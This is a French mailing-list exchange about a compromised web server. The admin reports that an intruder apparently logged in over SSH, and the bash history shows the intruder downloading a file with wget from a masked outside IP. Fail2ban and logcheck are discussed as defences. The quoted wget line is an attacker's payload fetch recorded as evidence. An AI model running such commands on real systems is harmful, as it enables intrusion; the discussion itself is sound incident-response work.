[Toulibre] serveur web compromis
Vincent Besse
vincent at ouhena.org
Ven 20 Mar 08:48:36 CET 2009
On Fri, 20 Mar 2009 00:18:11 +0100
Nicolas JULIEN <gronico at gronico.org> wrote:
> Si l'IP est hors de france, aucune chance que cela aboutisse. (un
> whois sur l'IP donnera des infos).
A première vue ça doit se situer en Europe très orientale. Je
regarderai quand même.
> >> dans /var/www/. Je m' en suis aperçu par l' historique bash.
>
> Si c'est par dans le log bash, il est passé par le ssh? les logs de
> tentative d'acces c'est direct en SSH ou sur un autre port?
> Juste pour savoir, pour verifier chez moi... Sinon, eviter les mots
> passe triviaux et fail2ban sont de bonnes solutions.
Ben, il était pas si trivial que çà! Il est apparemment passé par SSH.
Dans l' historique bash j' ai trouvé une ligne 'wget
http://AAA.BBB.CCC.DDD/fichierdemerde ' et une entrée
dans /var/log/auth.log pour une session ouverte depuis la même adresse
IP. Dans l' historique bash la ligne suivante est curieusement un '\'
tout seul (???).
Faudra que je me crée une règle pour logcheck pour me remonter aussi
les sessions ouvertes.
Plus d'informations sur la liste de diffusion Toulouse-ll